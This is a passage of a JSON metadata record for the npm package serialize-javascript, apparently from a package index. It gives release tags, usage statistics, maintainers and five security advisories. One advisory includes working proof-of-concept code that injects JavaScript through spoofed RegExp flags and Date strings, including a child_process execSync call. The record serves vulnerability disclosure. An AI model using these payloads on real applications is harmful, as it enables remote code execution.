alize-javascript/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"587bae62e2053cc13e2f4c6524a3cc0c9f211905","kind":"tag","published_at":"2015-08-27T20:24:42.000Z","download_url":"https://codeload.github.co
m/yahoo/serialize-javascript/tar.gz/v1.1.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"826a981a0783b2f69ed02c4ab5217015872344da","kind":"tag","published_at":"2015-08-26T20:21:35.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"bc8e8115e840c2c67c406eceb3499d537103ead6","kind":"commit","published_at":"2014-09-16T17:30:53.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.0.0/manifests"}]},"repo_metadata_updated_at":"2026-04-10T15:13:39.499Z","dependent_packages_count":2603,"downloads":219831407,"downloads_period":"last-month","dependent_repos_count":1239571,"rankings":{"downloads":0.0076389717889212465,"dependent_repos_count":0.028009
563226044566,"dependent_packages_count":0.030911824909290633,"stargazers_count":1.6429269809926448,"forks_count":2.162513511944723,"docker_downloads_count":0.009117482457744713,"average":0.6468530558865615},"purl":"pkg:npm/serialize-javascript","advisories":[{"uuid":"GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","url":"https://github.com/advisories/GHSA-qj8w-gfj5-8c6v","title":"Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects","description":"### Impact\n\n**What kind of vulnerability is it?**\n\nIt is a **Denial of Service (DoS)** vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from `Array.prototype` but has a very large `length` property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely.\n\n**Who is impacted?**\n\nApplications that use `serialize-javascript` to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to **Prototype Pollution** or handles untrusted data via **YAML Deserialization**, as these could be used to inject the malicious object.\n\n### Patches\n\n**Has the problem been patched?**\n\nYes, the issue has been patched by replacing `instanceof Array` checks with `Array.isArray()` and using `Object.keys()` for sparse array detection.\n\n**What versions should users upgrade to?**\n\nUsers should upgrade to **`v7.0.5`** or later.\n\n### Workarounds\n\n**Is there a way for users to fix or remediate the vulnerability without upgrading?**\n\nThere is no direct code-level workaround within the library itself. 
However, users can mitigate the risk by:\n\n* Validating and sanitizing all input before passing it to the `serialize()` function.\n* Ensuring the environment is protected against Prototype Pollution.\n* Upgrading to **`v7.0.5`** as soon as possible.\n\n### Acknowledgements\n\nSerialize JavaScript thanks **Tomer Aberbach** (@TomerAberbach) for discovering and privately disclosing this issue.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-27T18:18:54.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.9,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v","https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b","https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5","https://nvd.nist.gov/vuln/detail/CVE-2026-34043","https://github.com/advisories/GHSA-qj8w-gfj5-8c6v"],"source_kind":"github","identifiers":["GHSA-qj8w-gfj5-8c6v","CVE-2026-34043"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-04-10T16:00:30.844Z","epss_percentage":0.00052,"epss_percentile":0.16318,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"7.0.5","vulnerable_version_range":"\u003c 7.0.5"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","url":"https://github.com/advisories/GHSA-5c6j-r48x-rmvq","title":"Serialize JavaScript is Vulnerable to RCE via RegExp.flags and 
Date.prototype.toISOString()","description":"### Impact\n\nThe serialize-javascript npm package (versions \u003c= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `\u003cscript\u003e` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () =\u003e 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n  get: () =\u003e '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n```\n\n#### PoC 2: Code Injection via Date.toISOString()\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n```\n\n#### 
PoC 3: Remote Code Execution\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () =\u003e 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n  get: () =\u003e '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-28T02:50:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq","https://nvd.nist.gov/vuln/detail/CVE-2020-7660","https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9","https://github.com/advisories/GHSA-hxcc-f52p-wc94","https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","https://github.com/advisories/GHSA-5c6j-r48x-rmvq"],"source_kind":"github","identifiers":["GHSA-5c6j-r48x-rmvq"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-28T03:00:07.214Z","updated_at":"2026-04-05T20:00:56.707Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"7.0.3","vulnerable_version_range":"\u003c= 
7.0.2"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","url":"https://github.com/advisories/GHSA-76p7-773f-r4q5","title":"Cross-site Scripting (XSS) in serialize-javascript","description":"A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-02-10T18:30:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-11831","https://github.com/yahoo/serialize-javascript/pull/173","https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e","https://access.redhat.com/security/cve/CVE-2024-11831","https://bugzilla.redhat.com/show_bug.cgi?id=2312579","https://access.redhat.com/errata/RHSA-2025:1334","https://access.redhat.com/errata/RHSA-2025:1468","https://github.com/yahoo/serialize-javascript/commit/7f3ac252d86b802454cb43782820aea2e0f6dc25","https://access.redhat.com/errata/RHBA-2025:0304","https://access.redhat.com/errata/RHSA-2025:4511","https://access.redhat.com/errata/RHSA-2025:8059","https://access.redhat.com/errata/RHSA-2025:8479","https://access.redhat.com/errata/RHSA-2025:8544","https://access.redhat.com/errata/RHSA-2025:8551","https://access.redhat.com/errata/RHSA-
2025:21068","https://access.redhat.com/errata/RHSA-2025:21203","https://access.redhat.com/errata/RHSA-2025:9294","https://access.redhat.com/errata/RHSA-2025:8078","https://access.redhat.com/errata/RHSA-2025:10853","https://access.redhat.com/errata/RHSA-2025:8512","https://access.redhat.com/errata/RHSA-2025:8233","https://access.redhat.com/errata/RHSA-2025:3870","https://access.redhat.com/errata/RHSA-2025:0381","https://access.redhat.com/errata/RHSA-2026:1536","https://access.redhat.com/errata/RHSA-2026:2769","https://github.com/advisories/GHSA-76p7-773f-r4q5"],"source_kind":"github","identifiers":["GHSA-76p7-773f-r4q5","CVE-2024-11831"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2025-02-10T22:07:13.625Z","updated_at":"2026-04-10T16:03:28.146Z","epss_percentage":0.01098,"epss_percentile":0.78015,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"6.0.2","vulnerable_version_range":"\u003e= 6.0.0, \u003c 6.0.2"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","url":"https://github.com/advisories/GHSA-hxcc-f52p-wc94","title":"Insecure serialization leading to RCE in serialize-javascript","description":"serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function \"deleteFunctions\" within \"index.js\". \n\nAn object such as `{\"foo\": /1\"/, \"bar\": \"a\\\"@__R-\u003cUID\u003e-0__@\"}` was serialized as `{\"foo\": /1\"/, \"bar\": \"a\\/1\"/}`, which allows an attacker to escape the `bar` key. 
This requires the attacker to control the values of both `foo` and `bar` and guess the value of `\u003cUID\u003e`. The UID has a keyspace of approximately 4 billion making it a realistic network attack.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-08-11T17:21:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-7660","https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd","https://github.com/advisories/GHSA-hxcc-f52p-wc94"],"source_kind":"github","identifiers":["GHSA-hxcc-f52p-wc94","CVE-2020-7660"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2022-12-21T16:13:22.945Z","updated_at":"2026-04-05T20:07:06.090Z","epss_percentage":0.02901,"epss_percentile":0.86051,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"3.1.0","vulnerable_version_range":"\u003c 3.1.0"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","url":"https://github.com/advisories/GHSA-h9rv-jmmf-4pgx","title":"Cross-Site Scripting in serialize-javascript","description":"Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. 
This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2019-12-05T18:44:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.2,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx","https://nvd.nist.gov/vuln/detail/CVE-2019-16769","https://github.com/advisories/GHSA-h9rv-jmmf-4pgx","https://www.npmjs.com/advisories/1426"],"source_kind":"github","identifiers":["GHSA-h9rv-jmmf-4pgx","CVE-2019-16769"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2022-12-21T16:13:26.957Z","updated_at":"2026-04-13T12:11:46.928Z","epss_percentage":0.00406,"epss_percentile":0.60582,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"2.1.1","vulnerable_version_range":"\u003c 
2.1.1"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/serialize-javascript","docker_dependents_count":28296,"docker_downloads_count":8869719631,"usage_url":"https://repos.ecosyste.ms/usage/npm/serialize-javascript","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/serialize-javascript/dependencies","status":null,"funding_links":[],"critical":true,"issue_metadata":{"last_synced_at":"2026-04-10T06:01:04.524Z","issues_count":32,"pull_requests_count":139,"avg_time_to_close_issue":10114840.384615384,"avg_time_to_close_pull_request":7788997.183333334,"issues_closed_count":13,"pull_requests_closed_count":120,"pull_request_authors_count":30,"issue_authors_count":32,"avg_comments_per_issue":2.65625,"avg_comments_per_pull_request":0.8633093525179856,"merged_pull_requests_count":93,"bot_issues_count":0,"bot_pull_requests_count":88,"past_year_issues_count":4,"past_year_pull_requests_count":14,"past_year_avg_time_to_close_issue":68756.0,"past_year_avg_time_to_close_pull_request":285818.71428571426,"past_year_issues_closed_count":1,"past_year_pull_requests_closed_count":7,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":4.75,"past_year_avg_comments_per_pull_request":1.9285714285714286,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":7,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/issues","maintainers":[{"login":"okuryu","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/okuryu"},{"login":"redonkulus","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/redonkulus"}],"active_maintainers":[{"login":"okuryu","count":5,"url":"htt
ps://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/okuryu"},{"login":"redonkulus","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/redonkulus"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/codemeta","maintainers":[{"uuid":"redonkulus","login":"redonkulus","name":null,"email":"seth@bertalotto.net","url":null,"packages_count":92,"html_url":"https://www.npmjs.com/~redonkulus","role":null,"created_at":"2022-11-10T11:55:43.633Z","updated_at":"2022-11-10T11:55:43.633Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/redonkulus/packages"},{"uuid":"okuryu","login":"okuryu","name":null,"email":"okuryu@okuryu.com","url":null,"packages_count":19,"html_url":"https://www.npmjs.com/~okuryu","role":null,"created_at":"2022-11-10T11:55:43.521Z","updated_at":"2022-11-10T11:55:43.521Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/okuryu/packages"},{"uuid":"ericf","login":"ericf","name":null,"email":"eferraiuolo@gmail.com","url":null,"packages_count":39,"html_url":"https://www.npmjs.com/~ericf","role":null,"created_at":"2022-11-10T11:55:43.599Z","updated_at":"2022-11-10T11:55:43.599Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ericf/packages"}]}